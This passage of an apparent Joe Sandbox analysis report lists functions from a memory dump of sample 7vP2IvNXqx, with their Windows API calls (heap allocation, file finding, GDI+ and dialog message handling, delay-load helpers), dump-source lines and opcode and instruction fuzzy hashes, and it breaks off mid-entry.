                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 97d2a81fa59d4e1262ea889a7ac54d075b86d2fbb2a94d29780a51b0bd173810
                                        • Instruction ID: fecb84d8ef480f794e1ad5cf0567a7ceeb24ddcdfe303657aee0698a7b73919d
                                        • Opcode Fuzzy Hash: 97d2a81fa59d4e1262ea889a7ac54d075b86d2fbb2a94d29780a51b0bd173810
                                        • Instruction Fuzzy Hash: 43319E75C20289AECF15DF65C951AEFBBB4AF09300F5044AEE409B7242D735AE24CF61
                                        Function 002FAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 002FACF8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AddressProc
                                        • String ID:
                                        • API String ID: 190572456-0
                                        • Opcode ID: aa74de321b1b6e732e0b47e1f4795292ce10275455a154a3e514b2ad5ce384a2
                                        • Instruction ID: 365928d43f27ff936b60ad4f402cd912efb7417b70f216227c8bd96798e722f4
                                        • Opcode Fuzzy Hash: aa74de321b1b6e732e0b47e1f4795292ce10275455a154a3e514b2ad5ce384a2
                                        • Instruction Fuzzy Hash: 97110D7362122E5FDB239E18DC5047AF3999BC47A0B164532FE19EB254D731DC1187D1
                                        Function 002D9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 91d775f9d92caae8de6468c314dc141f4bfb86a211e83897d9cc00da5aa5eae1
                                        • Instruction ID: 679fd1f8fb5f1673bcdb22ebb884bf0ab17b3c8d1d5966f904fc560f10ae26ef
                                        • Opcode Fuzzy Hash: 91d775f9d92caae8de6468c314dc141f4bfb86a211e83897d9cc00da5aa5eae1
                                        • Instruction Fuzzy Hash: 4A018233920569ABCF12AFA8CC969DEB735AF88740B014116F816B7352DA34CD608AA0
                                        Function 002FC479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002FB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,002F9813,00000001,00000364,?,002F3F73,00000050,?,00311030,00000200), ref: 002FB177
                                        • _free.LIBCMT ref: 002FC4E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AllocateHeap_free
                                        • String ID:
                                        • API String ID: 614378929-0
                                        • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                        • Instruction ID: 9da4cad4c6cf2b1ddd09c8c78142c8ccdc133db4af3ff3cb6ddfd8a326c82871
                                        • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                        • Instruction Fuzzy Hash: 3D01DB7221030E5BE731CF65D85597AFBE9FB853B0F25052DE69483281EA30A905C764
                                        Function 002FB136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,002F9813,00000001,00000364,?,002F3F73,00000050,?,00311030,00000200), ref: 002FB177
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 864a2b0d64b051a44b8505f255a0955f5ab70f71240fbb6db93bcbb13f414f6d
                                        • Instruction ID: 588bfc4a3828805cecbec9329cc6feb6846fda50d9fbe7ee9b92b3192cd8f8fc
                                        • Opcode Fuzzy Hash: 864a2b0d64b051a44b8505f255a0955f5ab70f71240fbb6db93bcbb13f414f6d
                                        • Instruction Fuzzy Hash: 11F0363153512D67DB275E21ED25B7BF749AF417E0B194131BA0C96190CB60D92186A0
                                        Function 002F3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 002F3C3F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AddressProc
                                        • String ID:
                                        • API String ID: 190572456-0
                                        • Opcode ID: 626aa88ca4a2ccdefacae51d1b11aff759b0ba07569292df091bb3cd301a8818
                                        • Instruction ID: a676fb15e01b0eeae4ca0edd5bdd030611e7f3b87fd5aeec2c87d5c5cf539638
                                        • Opcode Fuzzy Hash: 626aa88ca4a2ccdefacae51d1b11aff759b0ba07569292df091bb3cd301a8818
                                        • Instruction Fuzzy Hash: 47F0823222021B9F8F16CE68EC109AAB799AB01BA07104136FB05E6190DB31DA30C790
                                        Function 002F8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002FCA2C,00000000,?,002F6CBE,?,00000008,?,002F91E0,?,?,?), ref: 002F8E38
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 374106cd55990ba726fb5cef54b5a2b8ecc7dc19edea0790cddd2977c6d8aca2
                                        • Instruction ID: c56565982732176142e9a8f0a033ceb341abd28d5a63b08e1a00c65c0d5a1e47
                                        • Opcode Fuzzy Hash: 374106cd55990ba726fb5cef54b5a2b8ecc7dc19edea0790cddd2977c6d8aca2
                                        • Instruction Fuzzy Hash: BDE0ED3163622E67EA722E219E05BBBF68C9F413E0F110131BE0896191CF60CC2086E1
                                        Function 002D5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002D5AC2
                                          • Part of subcall function 002DB505: __EH_prolog.LIBCMT ref: 002DB50A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: e97f5a2aa1f3749f6e8e79629887fd747663ac444234042f6b27752af18baf7f
                                        • Instruction ID: 67f6d15bf0a54362e465ab8a9a7e4fcba455d14b49ee977f7d839cc40076b5c9
                                        • Opcode Fuzzy Hash: e97f5a2aa1f3749f6e8e79629887fd747663ac444234042f6b27752af18baf7f
                                        • Instruction Fuzzy Hash: FC0181304616D0DAD715E7B8C0957DDF7A89F94304F90448EA46653282CBF81B19DBA2
                                        Function 002DA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002DA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,002DA592,000000FF,?,?), ref: 002DA6C4
                                          • Part of subcall function 002DA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,002DA592,000000FF,?,?), ref: 002DA6F2
                                          • Part of subcall function 002DA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,002DA592,000000FF,?,?), ref: 002DA6FE
                                        • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 002DA598
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Find$FileFirst$CloseErrorLast
                                        • String ID:
                                        • API String ID: 1464966427-0
                                        • Opcode ID: 409f369c040cf7d99e885738f4bc32d6a1543ff1989c306c31732f6888ad8ba4
                                        • Instruction ID: 3865ffef8d2c8212a5e87b1711d0cfa3ee3b7af0816c942e55caed81ac56cfcd
                                        • Opcode Fuzzy Hash: 409f369c040cf7d99e885738f4bc32d6a1543ff1989c306c31732f6888ad8ba4
                                        • Instruction Fuzzy Hash: BEF08931419790EACF225BB45904FC77B946F15331F048A4BF5FD52296C27558B49F23
                                        Function 002E0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetThreadExecutionState.KERNEL32(00000001), ref: 002E0E3D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ExecutionStateThread
                                        • String ID:
                                        • API String ID: 2211380416-0
                                        • Opcode ID: 0149d1d5c3638905facc05d1dbded79607561a9024a20492a70fa08a8dafd357
                                        • Instruction ID: aeb8db24a13a36e9b88793668a9fa181897f94897a344efb55f7b08e857fcccc
                                        • Opcode Fuzzy Hash: 0149d1d5c3638905facc05d1dbded79607561a9024a20492a70fa08a8dafd357
                                        • Instruction Fuzzy Hash: 73D0C210A720D556DA12372A285D7FE350A8FCF310F0D003BB18957282CAA80CE6A661
                                        Function 002EA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GdipAlloc.GDIPLUS(00000010), ref: 002EA62C
                                          • Part of subcall function 002EA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 002EA3DA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Gdip$AllocBitmapCreateFromStream
                                        • String ID:
                                        • API String ID: 1915507550-0
                                        • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                        • Instruction ID: fae1189cc9ffb891f5d0e4184777b04142679faf310fb0f01be19e8ed1153fd0
                                        • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                        • Instruction Fuzzy Hash: 6ED0C7712B0249B6DF416F638C1296E7699FB01344F448125B841D5151EAB1ED309552
                                        Function 002EDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,002E1B3E), ref: 002EDD92
                                          • Part of subcall function 002EB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002EB579
                                          • Part of subcall function 002EB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002EB58A
                                          • Part of subcall function 002EB568: IsDialogMessageW.USER32(00010456,?), ref: 002EB59E
                                          • Part of subcall function 002EB568: TranslateMessage.USER32(?), ref: 002EB5AC
                                          • Part of subcall function 002EB568: DispatchMessageW.USER32(?), ref: 002EB5B6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Message$DialogDispatchItemPeekSendTranslate
                                        • String ID:
                                        • API String ID: 897784432-0
                                        • Opcode ID: 84eeae08aa84c6cb5cf62b852b5e8113b928b93cf75995a486858ebb3f8c3004
                                        • Instruction ID: d669239d2fcee00f0d4ccd8d24deb8696fc7daba820b25521b186ed9e192de07
                                        • Opcode Fuzzy Hash: 84eeae08aa84c6cb5cf62b852b5e8113b928b93cf75995a486858ebb3f8c3004
                                        • Instruction Fuzzy Hash: 21D09E31194340BAD6032B52DD06F0B7AE6AB88B05F404554B784740B1CAB29D71DF15
                                        Function 002EE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • DloadProtectSection.DELAYIMP ref: 002EE5E3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: DloadProtectSection
                                        • String ID:
                                        • API String ID: 2203082970-0
                                        • Opcode ID: bfcfcc764558922642c0f6914be1680bdf4a64173a392f419eb74ccfe055f408
                                        • Instruction ID: efd624bca06ea65639503b2808dcdb99c2b1274dcec7982a68fc47dedfbcfa92
                                        • Opcode Fuzzy Hash: bfcfcc764558922642c0f6914be1680bdf4a64173a392f419eb74ccfe055f408
                                        • Instruction Fuzzy Hash: 37D0C9B01E02D19ADF23FFAA98C67553258B324706FD22121F145914B1DBA444A08A25
                                        Function 002D98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileType.KERNELBASE(000000FF,002D97BE), ref: 002D98C8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: FileType
                                        • String ID:
                                        • API String ID: 3081899298-0
                                        • Opcode ID: 23a5ee93263636841946226aba3ec32ca40ac40129a3147ea6faa949a2f7f54d
                                        • Instruction ID: ebae6bf75a85801271341f12d4fefc3c33b8d5f9b17475c7768e73d18443c4c2
                                        • Opcode Fuzzy Hash: 23a5ee93263636841946226aba3ec32ca40ac40129a3147ea6faa949a2f7f54d
                                        • Instruction Fuzzy Hash: EFC0123441110685CE214E2498440957315AE537657B88696E029C51A1C322CCE7FB01
                                        Function 002EE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE3FC
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 3430c7cb692a9861bc5dbe1f6fef3bba28f3c133386155ec4975a338febc60f2
                                        • Instruction ID: b56c86642e68a9bc8946496ece99650de4c720e3e7b17a728ea7a77b8b123138
                                        • Opcode Fuzzy Hash: 3430c7cb692a9861bc5dbe1f6fef3bba28f3c133386155ec4975a338febc60f2
                                        • Instruction Fuzzy Hash: FAB012F52F9080BC7519D2071C12C77030DC0C0F10371D22EF805C10C0D9804E540C33
                                        Function 002EE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE3FC
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 206d14c3b30954983be60e6f914098cde84f9a6edd0ad8630f57b1496a685dfd
                                        • Instruction ID: bcaa2bb890e8a09690e27a27c14c5dda341805414103580979c35e7520051e8d
                                        • Opcode Fuzzy Hash: 206d14c3b30954983be60e6f914098cde84f9a6edd0ad8630f57b1496a685dfd
                                        • Instruction Fuzzy Hash: C8B012E52FD0807C751992071D12CB7030DC4C0B10371D22EF505C10C0D9810C5D0833
                                        Function 002EE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE3FC
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
